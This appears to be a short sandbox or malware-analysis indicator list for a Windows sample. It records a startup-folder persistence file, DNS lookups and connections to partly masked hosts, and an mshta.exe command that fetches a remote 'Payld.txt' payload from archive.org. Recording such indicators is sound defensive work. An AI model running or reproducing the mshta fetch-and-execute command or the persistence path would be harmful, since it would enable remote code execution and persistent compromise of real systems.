Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.exe
- 'ia#####0.us.archive.org':443
- 'cr#.#odaddy.com':80
- 'microsoft.com':80
- http://cr#.#odaddy.com/gdroot.crl
- http://cr#.#odaddy.com/gdroot-g2.crl
- 'ia#####0.us.archive.org':443
- DNS ASK ia#####0.us.archive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\mshta.exe' https://ia601500.us.archive.org/32/items/payld_20210904/Payld.txt